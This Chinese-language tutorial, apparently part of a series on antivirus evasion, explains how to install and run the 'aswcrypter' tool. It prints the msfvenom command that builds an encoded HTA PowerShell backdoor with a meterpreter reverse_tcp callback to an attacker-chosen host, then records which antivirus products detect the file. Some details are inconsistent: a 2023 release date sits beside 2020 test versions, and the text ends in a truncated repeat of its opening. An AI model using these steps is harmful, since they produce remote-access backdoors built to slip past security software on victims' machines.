免殺能力一覽表
幾點說明:
1、上表中標識 √ 說明相應防毒軟體未檢測出病毒,也就是代表了bypass。
2、為了更好的對比效果,大部分測試payload均使用msf的windows/meterperter/reverse_tcp模組生成。
3、由於本機測試時只是安裝了360全家桶和火絨,所以預設情況下360和火絨防毒情況指的是靜態+動態查殺。360防毒版本5.0.0.8160(2020.01.01),火絨版本5.0.34.16(2020.01.01),360安全衛士12.0.0.2002(2020.01.01)。
5、完全不必要苛求一種免殺技術能bypass所有殺軟,這樣的技術肯定是有的,只是沒被公開,一旦公開第二天就能被殺了,其實我們只要能bypass目標主機上的殺軟就足夠了。
一、aswcrypter介紹
aswcrypter是2023年開源的免殺工具,原理比較簡單,使用msf生成hta**,然後使用python指令碼對hta**進行一定編碼處理,生成新的hta後門檔案,從而達到免殺效果。
二、安裝aswcrypter
需要本機安裝metasploit和python環境。
aswcrypter的安裝比較簡單,先git clone到本地
進入aswcrypter目錄,執行chmod +x ./aswcrypter.sh。
執行./aswcrypter.sh即可執行aswcrypter。
三、aswcrypter使用說明
使用時需要注意的只有一點,就是要在linux桌面環境中執行,因為在aswcrypter.sh指令碼中,呼叫msfvenom生成後門時使用了xterm。
xterm -t "shellcode generator(aswcrypter)"
-geometry 100x50 -e "msfvenom -p $paylo lhost=$lhost lport=$lport -i 43 -f hta-psh > $getpath/output/chars.raw"
四、利用aswcrypter生成後門
執行./aswcrypter.sh,選擇g,第一步也只有這個能選
然後輸入lhost和lport
後門選擇payload,我還是選擇最常規的reverse_tcp了,檔名就隨便輸乙個了
之後提示生成test4.hta成功,後面會提示是否開啟msf監聽,我這就不需要了,還是在mac上監聽埠。
不開殺軟的時候可正常上線
開啟殺軟,火絨靜態和動態都能查殺,360動態+靜態都沒報警。
試了下msfvenom生成的原始的hta檔案的查殺率
virustotal.com上查殺率為28/56
五、aswcrypter小結
aswcrypter是使用msfvenom生成基於powershell的hta後門檔案,然後進行編碼處理,達到一定的免殺效果,不過因為會呼叫powershell,行為檢測還是很容易被檢測出來。
六、參考資料
官方github:
遠控免殺專題 13 zirikatu免殺
0x01 免殺能力一覽表 幾點說明 1 上表中標識 說明相應防毒軟體未檢測出病毒,也就是代表了bypass。2 為了更好的對比效果,大部分測試payload均使用msf的windows meterperter reverse tcp模組生成。3 由於本機測試時只是安裝了360全家桶和火絨,所以預設情...